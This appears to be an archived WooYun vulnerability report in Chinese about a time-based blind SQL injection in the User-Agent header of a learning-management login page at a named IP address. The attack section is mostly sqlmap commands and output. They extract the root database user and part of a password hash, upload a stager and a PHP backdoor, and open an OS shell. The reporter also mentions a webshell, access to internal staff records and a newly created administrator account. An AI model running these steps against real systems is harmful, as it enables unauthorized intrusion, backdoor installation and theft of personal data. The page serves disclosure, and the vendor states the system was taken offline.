乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-30: 细节已通知厂商并且等待厂商处理中 2015-12-31: 厂商已经确认,细节仅向厂商公开 2016-01-10: 细节向核心白帽子及相关领域专家公开 2016-01-20: 细节向普通白帽子公开 2016-01-30: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
等待面试中...
注入点在登录界面
http://106.37.209.144/zlms/portal/sp/login.php
的
User-Agent
字段
E:\Python27\sqlmap>sqlmap.py -u "http://106.37.209.144/zlms/portal/sp/login.php" -p "User-Agent" --dbms "mysql" --current-db --current-user _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201512100967}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 23:40:30[23:40:30] [INFO] testing connection to the target URL[23:40:31] [INFO] checking if the target is protected by some kind of WAF/IPS/IDSsqlmap resumed the following injection point(s) from stored session:---Parameter: User-Agent (User-Agent) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: sqlmap/1.0-dev-nongit-201512100967 (http://sqlmap.org)' AND (SELECT * FROM (SELECT(SLEEP(5)))XzGg) AND 'gAdM'='gAdM---[23:40:31] [INFO] testing MySQLdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y[23:41:10] [INFO] confirming MySQL[23:41:10] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[23:41:31] [INFO] adjusting time delay to 4 seconds due to good response times[23:41:31] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.2.10, PHP 5.2.9back-end DBMS: MySQL >= 5.0.0[23:41:31] [INFO] fetching current user[23:41:31] [INFO] retrieved: root@localhost[23:50:59] [ERROR] invalid character detected. retrying..[23:50:59] [WARNING] increasing time delay to 5 secondscurrent user: 'root@localhost'[23:51:01] [INFO] fetching current database[23:51:01] [INFO] retrieved: lmscurrent database: 'lms'
E:\Python27\sqlmap>sqlmap.py -u "http://106.37.209.144/zlms/portal/sp/login.php" -p "User-Agent" --dbms "mysql" --password _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201512100967}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 00:14:13[00:14:13] [INFO] testing connection to the target URL[00:14:14] [INFO] checking if the target is protected by some kind of WAF/IPS/IDSsqlmap resumed the following injection point(s) from stored session:---Parameter: User-Agent (User-Agent) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: sqlmap/1.0-dev-nongit-201512100967 (http://sqlmap.org)' AND (SELECT * FROM (SELECT(SLEEP(5)))XzGg) AND 'gAdM'='gAdM---[00:14:14] [INFO] testing MySQL[00:14:14] [INFO] confirming MySQL[00:14:14] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.2.10, PHP 5.2.9back-end DBMS: MySQL >= 5.0.0[00:14:14] [INFO] fetching database users password hashes[00:14:14] [INFO] fetching database users[00:14:14] [INFO] fetching number of database users[00:14:14] [WARNING] time-based comparison requires larger statistical model, please wait..............................[00:14:26] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y1[00:14:50] [INFO] retrieved:[00:15:12] [INFO] adjusting time delay to 1 second due to good response times'root'@'localhost'[00:18:28] [INFO] fetching number of password hashes for user 'root'[00:18:28] [INFO] retrieved: 1[00:18:35] [INFO] fetching password hashes for user 'root'[00:18:35] [INFO] retrieved: 4630[00:19:29] [ERROR] invalid character detected. retrying..[00:19:29] [WARNING] increasing time delay to 2 secondsc75c3[00:21:04] [ERROR] invalid character detected. retrying..[00:21:04] [WARNING] increasing time delay to 3 seconds1e0f5b2do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] ndo you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] ndatabase management system users password hashes:[*] root [1]: password hash: ***********************
由于是延迟注入,跑数据实在是太耗时间了我就直接getshell吧
E:\Python27\sqlmap>sqlmap.py -u "http://106.37.209.144/zlms/portal/sp/login.php" -p "User-Agent" --dbms "mysql" --os-shell _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-201512100967}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 23:59:54[23:59:54] [INFO] testing connection to the target URL[23:59:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDSsqlmap resumed the following injection point(s) from stored session:---Parameter: User-Agent (User-Agent) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: sqlmap/1.0-dev-nongit-201512100967 (http://sqlmap.org)' AND (SELECT * FROM (SELECT(SLEEP(5)))XzGg) AND 'gAdM'='gAdM---[23:59:55] [INFO] testing MySQL[23:59:55] [INFO] confirming MySQL[23:59:55] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.2.10, PHP 5.2.9back-end DBMS: MySQL >= 5.0.0[23:59:55] [INFO] going to use a web backdoor for command prompt[23:59:55] [INFO] fingerprinting the back-end DBMS operating system[23:59:55] [INFO] the back-end DBMS operating system is Windowswhich web application language does the web server support?[1] ASP[2] ASPX[3] JSP[4] PHP (default)>[23:59:58] [WARNING] unable to retrieve automatically the web server document rootwhat do you want to use for writable directory?[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)[2] custom location(s)[3] custom directory list file[4] brute force search> 2please provide a comma separate list of absolute directory paths: C:\ZLMS2\htdocs\[00:01:30] [WARNING] unable to automatically parse any web server path[00:01:30] [INFO] trying to upload the file stager on '/ZLMS2/htdocs/' via LIMIT 'LINES TERMINATED BY' method[00:01:31] [INFO] heuristics detected web page charset 'ascii'[00:01:31] [INFO] the file stager has been successfully uploaded on '/ZLMS2/htdocs/' - http://106.37.209.144:80/tmpuumxu.php[00:01:31] [INFO] the backdoor has been successfully uploaded on '/ZLMS2/htdocs/' - http://106.37.209.144:80/tmpbbrrj.php[00:01:31] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTERos-shell> ipconfigdo you want to retrieve the command standard output? [Y/n/a] y[00:06:31] [INFO] heuristics detected web page charset 'GB2312'command standard output:---Windows IP ConfigurationEthernet adapter 本地连接: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.86.3 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.86.253---
webshell
100多条内部人员信息
创建了个管理员,以证明漏洞的存在
过滤!你们应该比我专业!
危害等级:中
漏洞Rank:8
确认时间:2015-12-31 13:53
经确认此系统属于已经废弃不用的系统。现在已经做下线处理。感谢Trail-Say。
暂无